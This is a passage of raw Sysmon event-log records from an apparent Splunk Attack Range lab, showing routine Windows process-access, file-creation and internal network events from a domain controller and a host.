tdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0D00-000000003802}8881056C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F2AD-6215-C000-000000003802}48565368C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.583{C8EA50B7-F2AD-6215-C000-000000003802}48565368C:\Windows\Explorer.EXE{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1093d6|C:\Windows\System32\TwinUI.dll+82ba7|C:\Windows\System32\TwinUI.dll+bed5e|C:\Windows\System32\TwinUI.dll+bed29|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:39.520{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:40.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3440183C266204A44AFB21D193FF58B,SHA256=27E6A567FA0F4DB79C41E4B466096769F641F8CC5F13CB15D0449CC9DA4CF9E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:40.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B5E4DAC1C8F5D8FD76A9081AAB94A8,SHA256=F458E46CCADBDB9FBA4C251FE48579B7607C0D70BB4DF9FD7C90E0A365B74A9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:41.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B9C36018F77435BA1B3C7B70EFDCCF,SHA256=74215494DB9C5D7FD161EFDF5B11C61A62B894DEAA4610906A8A51ADD4F5609B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:38.980{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53283-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000285795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:41.036{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78428D5C3FEFA0E71C097B4305E38954,SHA256=71BC271D0CF72F3224323853509A756DBA38A6579FA142482E56233EC9E34C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:42.381{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28DA4C1F66EC0AB8FC15E3002AA1BA42,SHA256=EE409C1DABE3001DF073DD44DD87A35E4F5F5D40B7CCA51D6672E03F1324C525,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:42.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8D3B9723D41D07444632999C4CA87BF,SHA256=B28E38B788C1EC9DCA1D70E70462C7E823C041422267AB3830EA7BDE1A34478C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:43.382{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617B2E25380DCCC6E853CDC32E887291,SHA256=232E2BB0F22D711B21E963D39CCBFE5F7C0E2B4641AC1E796C65FE8B3E329A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:43.177{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7923010BD7DDB8DD09230AFBCF51E114,SHA256=FC15E51C2377E59AAF2E753EFD91F4DB884DA6F42F493324608EB41BDBA010EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:40.633{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51220-false10.0.1.12-8000- 23542300x8000000000000000214855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:43.009{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-124MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:44.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=862A87184A05B5A7BA875C76494AA4BD,SHA256=292C7A24187856B1B468E6C91A7119662AFFF9E887D62F205698250FC17C1667,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.925{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.925{C8EA50B7-F2AD-6215-B800-000000003802}43485380C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 23542300x8000000000000000285820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.864{C8EA50B7-F2AF-6215-C200-000000003802}4300ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\59A4FKRV\microsoft.windows[1].xmlMD5=EA79B27D8890033A611F0F54AB21F7D2,SHA256=B6CCBFFFE5C21D5D6E721F0E68BB53A6D46748000FEBC7F01BF101B5F28652F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.848{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.848{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:44.833{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 